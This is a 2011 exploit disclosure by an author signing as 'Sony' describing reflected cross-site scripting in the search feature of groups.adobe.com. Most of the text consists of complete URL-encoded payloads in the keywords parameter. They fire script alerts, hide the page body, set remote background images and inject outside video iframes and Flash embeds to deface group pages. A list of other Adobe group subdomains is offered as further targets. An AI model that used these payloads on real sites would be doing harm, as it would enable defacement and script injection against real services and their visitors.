;)

# Exploit Title: Adobe Groups Cross Site Scripting
# Date: 30.08.2011
# Author: Sony
# Software Link: http://groups.adobe.com/
# Blog: http://st2tea.blogspot.com/

..................................................................

Well, we can see:

http://xssed.com/mirror/71488/

Don't work and it's sadly..omg!

But..

Let's Go:

http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534

Use Live HTTP Headers:

POST /index.cfm?event=group.search&groupid=1128
keywords=1&lastactivity=Anytime&author=&type=

=1128 keywords=

John + Jane = Love

1128 + keywords = our Way

http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://i53.tinypic.com/dp8jyv.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Ciframe%20width=%22560%22%20height=%22345%22%20src=%22http://www.youtube.com/embed/sFYLp-r0ZVA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&lastactivity=in+the+last+year&author=&type=

All Adobe Groups:

http://madnet.name/tools/madss/

cpaug.groups.adobe.com
cppug.groups.adobe.com
cpug.groups.adobe.com
creativecrew.groups.adobe.com
creativesuitesanjose.groups.adobe.com
csneworleans.groups.adobe.com
cssierra.groups.adobe.com
cswestmd.groups.adobe.com
daaug.groups.adobe.com
dallasae.groups.adobe.com
dallaspremiere.groups.adobe.com
dalpug.groups.adobe.com
dc-metro.groups.adobe.com
dccfug.groups.adobe.com
dco.groups.adobe.com
ddla.groups.adobe.com
denverflex.groups.adobe.com
denverlivecycle.groups.adobe.com
derbyaug.groups.adobe.com
desmoines.groups.adobe.com

etc..

So..what can we do?

I don't know..let's go dance!

http://nasa.groups.adobe.com/index.cfm?event=group.search&groupid=1128&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://th1192.photobucket.com/albums/aa321/Albertlinux/fundos/th_matrix.gif%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3COBJECT%20width=%22470%22%20height=%22353%22%3E%3CPARAM%20name=%22movie%22%20value=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%3E%3C/PARAM%3E%3CPARAM%20name=%22wmode%22%20value=%22window%22%3E%3C/PARAM%3E%3CPARAM%20name=%22allowFullScreen%22%20value=%22true%22%3E%3C/PARAM%3E%3CEMBED%20src=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%20type=%22application/x-shockwave-flash%22%20wmode=%22window%22%20width=%22470%22%20height=%22353%22%20allowFullScreen=%22true%22%20%3E%3C/EMBED%3E%3C/OBJECT%3E&lastactivity=in+the+last+year&author=&type=